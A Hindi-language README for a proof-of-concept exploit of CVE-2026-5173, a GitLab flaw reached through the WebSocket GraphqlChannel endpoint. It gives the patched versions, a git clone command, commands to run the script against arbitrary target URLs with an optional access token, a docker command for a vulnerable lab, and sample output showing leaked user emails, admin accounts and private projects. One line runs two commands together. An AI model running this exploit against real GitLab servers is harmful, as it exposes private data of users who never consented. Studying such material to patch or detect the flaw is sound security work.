
CVE-2026-5173
CVE-2026-5173 निम्न-विशेषाधिकार वाले प्रमाणित हमलावर को GitLab के WebSocket (/-/cable) एंडपॉइंट के माध्यम से, विशेष रूप से GraphqlChannel के ज़रिए, प्रतिबंधित बैकएंड विधियों को कॉल करने की अनुमति देता है।
इससे संवेदनशील डेटा उजागर होना (उच्च गोपनीयता) और सीमित अनधिकृत कार्य हो सकते हैं।
पैच इनमें किया गया: 18.8.9 • 18.9.5 • 18.10.3
python3 CVE-2026-5173.py http://target:8080git clone https://github.com/0xBlackash/CVE-2026-5173.git
cd CVE-2026-5173
python3 CVE-2026-5173.py http://your-gitlab-lab:8080
टोकन के साथ (अनुशंसित):
python3 CVE-2026-5173.py http://target.com:8080 -t glpat-XXXXXXXXXXXXXXXXXXXX
सफल आउटपुट का उदाहरण:
[+] CVE-2026-5173 PoC v2 - Target: http://192.168.1.100:8080
[+] WebSocket connected
[+] Subscribed to GraphqlChannel
[*] Testing method: currentUser
[SUCCESS] Possible unauthorized access via 'currentUser'!
→ Response: {"result":{"data":{"currentUser":{"id":"gid://gitlab/User/123","name":"Normal User","email":"[email protected]"}}}...
[*] Testing method: users
[SUCCESS] Possible unauthorized access via 'users'!
→ Response: {"result":{"data":{"users":{"nodes":[ {"id":"gid://gitlab/User/1","name":"Admin","email":"[email protected]"}, ... ]}}} ← This leaks all users including admins!
[*] Testing method: projects
[SUCCESS] Possible unauthorized access via 'projects'!
→ Response: long list of ALL projects (even private ones you shouldn't see)
python3 CVE-2026-5173.py <target> [options]
Arguments:
target Target URL (e.g. http://gitlab.example.com:8080)
-t, --token GitLab Personal Access Token (API scope)
-h, --help Show this help message
docker run -d --name gitlab-vuln \
-p 8080:80 -p 2222:22 \
gitlab/gitlab-ce:18.10.2-ce.0
फिर एक सामान्य उपयोगकर्ता बनाएँ और PoC चलाएँ।
सुरक्षा समुदाय के लिए ❤️ के साथ निर्मित
यदि आपको यह उपयोगी लगा तो रिपॉजिटरी को ⭐ स्टार करें!
अस्वीकरण: निर्माण के समय कोई सार्वजनिक विस्तृत एक्सप्लॉइट उपलब्ध नहीं था। यह एक शोध-स्तरीय PoC है।